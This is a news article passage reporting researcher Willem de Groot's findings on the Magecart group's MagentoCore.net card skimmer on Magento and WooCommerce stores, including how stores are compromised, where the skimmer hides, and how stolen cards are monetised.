The independent malware hunter Willem de Groot said he suspects the Magecart group to be behind it is the same outfit that pulled off the Ticketmaster heist earlier in 2018.
The infections are part of a single effort, all tied back to one well-resourced group with global reach. The campaign is global, de Groot said, and ongoing. According to de Groot’s nightly scans, new stores are being hijacked at the alarming pace of 50 to 60 stores per day.
Further, the script appears to be rather persistent. The average recovery time is “a few weeks” he said, with at least 1,450 ecommerce sites hosting the MagentoCore.net parasite during the full six months of his analysis.
The Magecart actors are targeting online stores running WooCommerce from WordPress and Magento software, and “the attack vector is, in almost all recent cases, brute-forcing the administrator password.” Attackers can also gain unauthorized access from a staff computer that’s infected with malware, or by hijacking an authorized session using a vulnerability in the content management system (CMS).
As for the code itself, the skimmer has been around since December 2017, although less sophisticated versions were found as early as 2015. Once the actors succeed in gaining access to the back-end CMS running the website, they embed the MagentoCore.net Javascript code into the HTML template. This can be hidden in a few places, including in default HTML headers and footers, and in minimized, static, hidden Javascript files deep in the codebase. It also adds a backdoor to cron.php.
Once installed, it sets about recording the keystrokes of unsuspecting online shoppers, sending everything in real-time to the malware’s Muscovite server, registered in Moscow. MageCart has been seen recruiting US money mules to monetise the stolen card information; and de Groot said they can also sell them on the black market for USD 5 to USD 30 per card.
Every day we send out a free e-mail with the most important headlines of the last 24 hours.
Subscribe now